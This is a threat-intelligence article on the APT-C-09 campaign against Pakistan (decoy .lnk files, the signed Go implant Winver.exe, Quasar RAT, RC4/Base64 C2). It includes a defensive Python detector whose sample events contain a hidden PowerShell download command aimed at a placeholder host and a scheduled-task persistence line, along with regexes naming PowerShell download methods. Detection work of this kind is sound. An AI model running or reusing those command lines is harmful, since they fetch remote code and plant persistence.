APT-C-09: Master of Disguise and Deception

Stealth and encryption help the group to spy on the target systems without being noticed.

According to a report from the 360 Advanced Threat Research Institute, the APT-C-09 group is conducting relentless attacks on Pakistan using new malware.

To carry out attacks, the group uses decoy shortcut (.lnk) files disguised as documents. One of these files is named "Quran.pdf.lnk" and runs PowerShell scripts when opened. The scripts download fake documents and malicious components from remote servers and create tasks to maintain a long-term presence on the infected system.
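As an added illustration (not code from the 360 report or the original post), the following Python detector runs over constructed Sysmon-style events for the chain described above: a document-disguised .lnk file, PowerShell launched by Explorer that downloads from a remote server, and a task created from PowerShell. The event field names, file paths and URL are assumptions made for this example.

```python
import re

# Constructed sample telemetry in a Sysmon-like shape (FileCreate and ProcessCreate).
# Field names, paths and the URL are assumed for this example; these are not real logs.
EVENTS = [
    {"type": "FileCreate", "target": r"C:\Users\u\Downloads\Quran.pdf.lnk"},
    {"type": "ProcessCreate", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -w hidden -ep bypass -c "iwr http://placeholder.invalid/s.ps1 -OutFile $env:TEMP\s.ps1"'},
    {"type": "ProcessCreate", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks.exe /create /sc minute /mo 15 /tn Winver /tr "%APPDATA%\Winver.exe"'},
    {"type": "ProcessCreate", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Reader\reader.exe",
     "cmd": r'"C:\Program Files\Reader\reader.exe" "C:\Users\u\Downloads\report.pdf"'},
]

# A document extension immediately followed by .lnk is the decoy pattern from the report.
DOC_DISGUISED_LNK = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)\.lnk$", re.I)
HIDDEN_WINDOW = re.compile(r"\s-w(indowstyle)?\s+h", re.I)
ENCODED_CMD = re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)
DOWNLOADER = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return the names of the detection rules a single event matches."""
    hits = []
    if ev["type"] == "FileCreate":
        if DOC_DISGUISED_LNK.search(basename(ev["target"])):
            hits.append("lnk_with_document_double_extension")
        return hits
    image, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmd"]
    if image == "powershell.exe" and parent == "explorer.exe":
        # PowerShell spawned by the shell itself is how an opened .lnk shows up in telemetry.
        if HIDDEN_WINDOW.search(cmd) or ENCODED_CMD.search(cmd):
            hits.append("hidden_or_encoded_powershell_from_explorer")
        if DOWNLOADER.search(cmd):
            hits.append("powershell_downloader_from_explorer")
    if image == "schtasks.exe" and parent == "powershell.exe" and "/create" in cmd.lower():
        hits.append("scheduled_task_created_by_powershell")
    return hits

def scan(events):
    """Map event index -> matched rules, keeping only events that matched something."""
    return {i: classify(ev) for i, ev in enumerate(events) if classify(ev)}

if __name__ == "__main__":
    for i, rules in scan(EVENTS).items():
        print(i, rules)
```

Each rule alone is noisy on a real estate; the value is in seeing the three fire in sequence on one host within a short window.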

The main malicious component is the file "Winver.exe", written in Go (Golang). The file carries a digital certificate, which makes it harder for antivirus products to detect and block. At startup Winver.exe collects information about the system, the user and other parameters, and then transmits the data to the C2 server over encrypted communication channels.

In addition, attacks were detected using Quasar RAT — another malicious tool that APT-C-09 has used repeatedly in the past. The Trojan lets the operator execute a wide range of remote commands, including taking screenshots and managing files and processes on the infected system.

New threats and ongoing improvements in methods

This analysis shows that APT-C-09 is actively developing and improving its methods. The group does not limit itself to old tools, but constantly introduces new techniques to bypass security systems and achieve its goals.

One of the characteristic features of APT-C-09 attacks is the use of Let's Encrypt certificates to encrypt communication with the command-and-control server, together with RC4 encryption and Base64 encoding, both of which were also seen in the group's previous attacks.

Due to ongoing attacks, it is important to strengthen security measures and exercise caution when working with unknown files and links. Users are advised to avoid opening suspicious attachments and links, and to regularly update their antivirus software and security systems.
